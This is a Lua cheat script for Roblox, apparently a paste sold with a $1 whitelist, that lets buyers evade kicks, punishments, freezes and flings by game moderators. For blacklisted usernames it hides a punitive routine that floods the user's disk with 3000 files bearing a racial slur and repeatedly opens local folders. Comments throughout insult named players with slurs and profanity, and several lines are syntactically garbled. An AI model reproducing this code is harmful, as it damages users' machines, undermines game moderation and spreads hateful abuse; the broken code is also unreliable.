
Weeb's Anti-Kick Script

Sep 9th, 2019
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  1. game:GetService('Players').LocalPlayer.Name = "FionaWolfgang"
  2. table.foreach(workspace:GetChildren(),function(a,b) if b.Name == "Anti Stuff" then b:Destroy() end end)
  3. wait(1)
  4. local version = "1.3 (6/26/2018)"
  5. --Variables ecks dee
  6. local players = game:GetService("Players")
  7. local user = players.LocalPlayer
  8. local name = user.Name
  9. local a ="Message",workspace)
  10. a.Name = "Anti Stuff"
  12. --For Blacklisted fucks lol
  13. function idiotnoob()
  14. function stupid()
  15. writefile('blacklist '..math.random(1,2e9)..'.txt', 'hey nigger:[''] Why you blacklisted cunt?')
  16. end
  18. local amount = 3000
  20. for i=1,amount do
  21. stupid()
  22. end
  24. function lol()
  25. game:OpenScreenshotsFolder()
  26. game:OpenVideosFolder()
  27. end
  28. for i=1,amount do
  29. lol()
  30. end
  31. end
  33. --Whitelist Checker
  34. local BL = {
  35. "ROBLOX", --Lol ur gay
  36. "InceptionTime", -- Ur twice as gay as ROBLOX
  37. "IoIman616", --Creator of IY is meaniebutface head
  38. "404TestAcc404", --My alt but blacklisted for testing
  39. "Fadedfade", -- Lol ur the worst cousin ever, BITCH!
  40. "pretitdor101", -- haha blacklisted
  41. }
  42. BLACKLISTED=false
  43. table.foreach(BL,function(a,b)
  44. if name == tostring(b) then BLACKLISTED=true
  45. idiotnoob()
  46. wait(3)
  47. table.foreach(workspace:GetChildren(),function(a,b) if b.Name == "Anti Stuff" then b:Destroy() end end)
  48. user:Kick('Sorry, It appears you are blacklisted! '' DM <-[Tohru]->#6917 for appeal! {P.S. If youre blacklisted, you probably wont get Unblacklisted but hey, its worth a try lol')
  49. game.StarterGui:SetCore('SendNotification', {Title='Blacklisted'; Text='Player : '"Players").LocalPlayer.Name..' You are Blacklisted!'})
  50. end
  51. end)
  52. local WL = {
  53. "D3F4ULTL00K",
  54. "FionaWolfgang",
  55. "StrictlyMusic",
  56. "garyshaw3",
  57. "IStrictlyExploit",
  58. "L0LIP0PF4IL",
  59. "DangoFreeze",
  60. "infestedmite64",
  61. "ParanoidActions",
  62. "TheAngryShift",
  63. "coolsnape10",
  64. "Zetsubough",
  65. "ShidareSan",
  66. "1337V3rm", -- Dick to me in DMS
  67. "AegisMKIII", --Suprisingly appealed a blacklist Lucky cunt
  68. "A_Void",
  69. "0Lizard",
  70. "XxDarKxDukexX",
  71. "XxLighTxDukexX",
  72. "Rule_x34",
  73. "TheyCallMe_Pat",
  74. "leelandshoe",
  75. "leelandshoe97",
  76. "fernandos10",
  77. "QTN4",
  78. "Q_axe",
  79. }
  80. table.foreach(WL,function(a,b)
  81. if name == tostring(b) and not BLACKLISTED then WHITELISTED=true end
  82. end)
  83. if WHITELISTED then
  84. game.StarterGui:SetCore('SendNotification', {Title='Certified Weeb'; Text='Player : '' You are Whitelisted! Your script(s) will execute in [30] total seconds'})
  85. a.Text = "Whitelisted!"
  86. elseif not WHITELISTED and not BLACKLISTED then
  87. user:Kick('It appears you arent whitelisted! ''! DM to <-[Tohru]->#6917 buy and whitelist!')
  88. a.Text = "Not Whitelisted, DM <-[Tohru]->#6917 for a $1 Whitelist."
  89. end
  90. --Anti Crash Script
  91. function AntiCrash()
  92. function Part1()
  93. game:GetService("RunService").RenderStepped:connect(function()
  94. table.foreach(user.Backpack:GetChildren(),function(a,b) if b.Name == "-" then game.StarterGui:SetCore('SendNotification', {Title='AntiCrash'; Text='Hey ''! Someone tried to crash you!'}) end end)
  95. end)
  96. end
  97. function nou()
  101. user.Character=aa
  102. end
  103. function aaa()
  104. game:GetService("RunService").RenderStepped:connect(function()
  105. table.foreach(user.Backpack:GetChildren(),function(a,b) if b.Name == "-" then nou() end end)
  106. end)
  107. end
  108. game:GetService("RunService").RenderStepped:connect(function()
  109. table.foreach(user.Backpack:GetChildren(),function(a,b) if b.Name == "-" then user.Backpack:ClearAllChildren() end end)
  110. end)
  111. Part1()
  112. aaa()
  113. game.StarterGui:SetCore('SendNotification', {Title='AntiCrash'; Text='Hey ''! AntiCrash ran successfully'})
  114. a.Text = "(Might not work) Anti Crash loaded"
  115. end
  116. --Anti Kick Script
  117. function AntiKick()
  118. local AntiKick=false
  119. function respawn()
  123. user.Character=aa
  124. end
  125. user.CharacterAdded:connect(function(RIP)
  126. if AntiKick then
  127. AntiKick=false
  128. respawn()
  129. end
  130. for i,v in pairs(RIP:GetChildren()) do
  131. if v:IsA("SkateboardPlatform") then
  132. game.StarterGui:SetCore('SendNotification', {Title='AntiKick'; Text='Hey ''! Someone attempted to kick you LOL'})
  133. v:Destroy()
  134. AntiKick=true
  135. end
  136. end
  137. RIP.ChildAdded:connect(function(haha)
  138. if haha:IsA("SkateboardPlatform") then wait()
  139. haha:Destroy()
  140. game.StarterGui:SetCore('SendNotification', {Title='AntiKick'; Text='Hey ''! Someone attempted to kick you LOL'})
  141. AntiKick=true
  142. end
  143. end)
  144. end)
  145. respawn()
  146. game.StarterGui:SetCore('SendNotification', {Title='AntiKick'; Text='Hey ''! AntiKick ran successfully'})
  147. a.Text = "Anti Kick Loaded"
  148. end
  149. --FE Checker
  150. function FEChecker()
  151. FE = game:GetService("Workspace").FilteringEnabled
  152. if FE == true then
  153. game.StarterGui:SetCore('SendNotification', {Title='FilteringEnabled'; Text='Hey ''! Filtering is enabled! D:'})
  154. a.Text = "Game is FilteringEnabled"
  155. else
  156. game.StarterGui:SetCore('SendNotification', {Title='FilteringEnabled'; Text='Hey ''! Filtering is disabled! :D'})
  157. a.Text = "Game is FilteringDisabled"
  158. end
  159. end
  160. --Anti Fling Script
  161. function AntiFling()
  162. function Part2()
  163. game:GetService("RunService").RenderStepped:connect(function()
  164. table.foreach(user.Character:GetDescendants(),function(a,b) if b:IsA("BodyForce") then game.StarterGui:SetCore('SendNotification', {Title='AntiFling'; Text='Hey ''! Someone attempted to fling you!'}) end end)
  165. table.foreach(user.Character:GetDescendants(), function(a,b) if b:IsA("BodyForce") then user.Character.Humanoid.Sit = false end end)
  166. end)
  167. end
  168. game:GetService("RunService").RenderStepped:connect(function()
  169. table.foreach(user.Character:GetDescendants(),function(a,b) if b:IsA("BodyForce") then b:Destroy() end end)
  170. end)
  171. Part2()
  172. game.StarterGui:SetCore('SendNotification', {Title='AntiFling'; Text='Hey ''! AntiFling ran successfully'})
  173. a.Text = "Anti Fling Loaded"
  174. end
  175. --Anti Freeze Script
  176. function AntiFreeze()
  177. function Part3()
  178. game:GetService("RunService").RenderStepped:connect(function()
  179. table.foreach(user.Character:GetDescendants(),function(a,b) if b.Name == "Torso" and b.Anchored then
  180. game.StarterGui:SetCore('SendNotification', {Title='AntiFreeze'; Text='Hey ''! Someone tried to freeze you!'}) end end)
  181. end)
  182. end
  183. game:GetService("RunService").RenderStepped:connect(function()
  184. table.foreach(user.Character:GetDescendants(),function(a,b) if b:IsA("Part") and b.Anchored then b.Anchored = false end end)
  185. end)
  186. Part3()
  187. game.StarterGui:SetCore('SendNotification', {Title='AntiFreeze'; Text='Hey ''! AntiFreeze ran successfully'})
  188. a.Text = "Anti Freeze Loaded"
  189. end
  190. --Anti Punish Script
  191. function AntiPunish()
  192. game:GetService("RunService").Stepped:connect(function()
  193. if user.Character then
  194. if user.Character.Parent~=workspace then
  195. user.Character.Parent=workspace
  196. game.StarterGui:SetCore('SendNotification', {Title='AntiPunish'; Text='Hey ''! Someone tried to punish you! (or you died xd)'})
  197. end
  198. end
  199. end)
  200. game.StarterGui:SetCore('SendNotification', {Title='AntiPunish'; Text='Hey ''! AntiPunish ran successfully'})
  201. a.Text = "Anti Punish Loaded"
  202. end
  203. --Anti Punish Clone Deleter
  204. function CloneDelete()
  205. game:GetService("RunService").RenderStepped:connect(function()
  206. for i,v in pairs(workspace:GetChildren()) do
  207. if v.Name==game:GetService("Players").LocalPlayer.Name then
  208. if game:GetService("Players").LocalPlayer.Character~=v then
  209. v:Destroy()
  210. game.StarterGui:SetCore('SendNotification', {Title='CloneDeleter'; Text='Hey ''! Clone Deletion was successful'})
  212. end
  213. end
  214. end
  215. end)
  216. game.StarterGui:SetCore('SendNotification', {Title='CloneDeleter'; Text='Hey ''! CloneDeleter ran successfully'})
  217. a.Text = "Clone deleter loaded"
  218. end
  219. wait(1)
  220. if WHITELISTED then
  221. print("Changelog (6/21/2018)")
  222. print("-Fixed Script and *most* errors*")
  223. print("-Fixed Whitelist")
  224. print("-Released Script")
  225. print("------------------------------------------------------------------------")
  226. print("Soon to be added")
  227. print("--Anti Kill")
  228. print("--Auto clone deletion (Anti Punish)")
  229. print("--Less lag")
  230. print("--Harder to crack (More and better obfuscation)")
  231. print("------------------------------------------------------------------------")
  232. print("Info")
  233. print("---Discord = [Certified Weeb]#6917, DM for problems/questions")
  234. print("---Script may not always work and/or cause you to crash")
  235. print("The script is reported to lag sometimes but it actually does not, it only appears to lag when running large scripts like OMNI GOD")
  236. print("------------------------------------------------------------------------")
  237. print("Changelog (6/22/2018)")
  238. print("-Added notifiers (missing ones for kick and crash")
  239. print("-Added Auto Clone deletion for antipunish")
  240. print("------------------------------------------------------------------------")
  241. print("Soon to be added")
  242. print("--Anti Kill")
  243. print("--Less lag")
  244. print("--Harder to crack (More and better obfuscation)")
  245. print("--Better Whitelist system")
  246. print("------------------------------------------------------------------------")
  247. print("Changelog (6/23/2018)")
  248. print("-Added notifer for kick (working on crash)")
  249. print("Started development on anti kill and less lag")
  250. print("Added variables to make future updates more easy and convenient")
  251. print("------------------------------------------------------------------------")
  252. print("Soon to be added")
  253. print("--Anti Kill")
  254. print("--Less lag")
  255. print("--Harder to crack (More and better obfuscation)")
  256. print("--Better Whitelist system")
  257. print("--GUI for configuration so you could choose what scripts to run and which to not")
  258. print("------------------------------------------------------------------------")
  259. print("Changelog (6/23/2018)")
  260. print("-Added notifer for kick (working on crash)")
  261. print("-Added a better method of seeing things (load)")
  262. print("-Slowed injecton time... Sorry ;C")
  263. print("------------------------------------------------------------------------")
  264. print("Soon to be added")
  265. print("--Anti Kill")
  266. print("--Less lag")
  267. print("--Harder to crack (More and better obfuscation)")
  268. print("--Better Whitelist system")
  269. print("--GUI for configuration so you could choose what scripts to run and which to not")
  270. print("------------------------------------------------------------------------")
  271. print("Changelog (6/26/2018)")
  272. print("-Added notifer for kick and crash")
  273. print("-Fucked you over if you're blacklisted")
  274. print("-Slowed injecton time... Sorry ;C")
  275. print("-Slightly fixed Anti crash")
  276. wait(4)
  277. print("------------------------------------------------------------------------")
  278. print("Running Anti Crash, This version is bad. Wait at least 5 seconds after a crash")
  279. print("To see if it worked or not, it's really slow and bad and hecc sometimes doesn't even work")
  280. AntiCrash()
  281. wait(4)
  282. print("------------------------------------------------------------------------")
  283. print("Running Antikick, this isn't the best anti kick in the world but it stops commonly used kicks")
  284. print("Such as IY, Rocky2u, TopK3k, you name it. If somehow you still get kicked, dont complain to me about it")
  285. print("It isn't state of the art")
  286. AntiKick()
  287. wait(4)
  288. print("------------------------------------------------------------------------")
  289. print("Running FE Check, lol, nothing to say, it checks FE")
  290. FEChecker()
  291. wait(4)
  292. print("------------------------------------------------------------------------")
  293. print("Running Anti Fling, shitty anti fling i made in like 5 mins, works but not against loop fling oh well")
  294. AntiFling()
  295. wait(4)
  296. print("------------------------------------------------------------------------")
  297. print("Running Anti Freeze, Nothing to say about this, it works i guess lol, btw the notifier bugs a little")
  298. AntiFreeze()
  299. wait(4)
  300. print("------------------------------------------------------------------------")
  301. print("Running Anti Punish, Works, only con is that when you die, you won't despawn lol")
  302. AntiPunish()
  303. wait(4)
  304. print("------------------------------------------------------------------------")
  305. print("Running Clone Deleter, For the anti punish, may cause some lag idk")
  306. CloneDelete()
  307. wait(1)
  308. game.StarterGui:SetCore('SendNotification', {Title='Changelogs'; Text='Click F9 on your keyboard then scroll up to view the changelogs!'})
  309. print("------------------------------------------------------------------------")
  310. print("Hope you enjoy the script! Thanks for buying!")
  311. print('You are running STUFF by <-[Tohru]->#6917 and Tristan#1673. Version: '..version..' ')
  312. wait(2)
  313. table.foreach(workspace:GetChildren(),function(a,b) if b.Name == "Anti Stuff" then b:Destroy() end end)
  314. warn("Script end...")
  315. end
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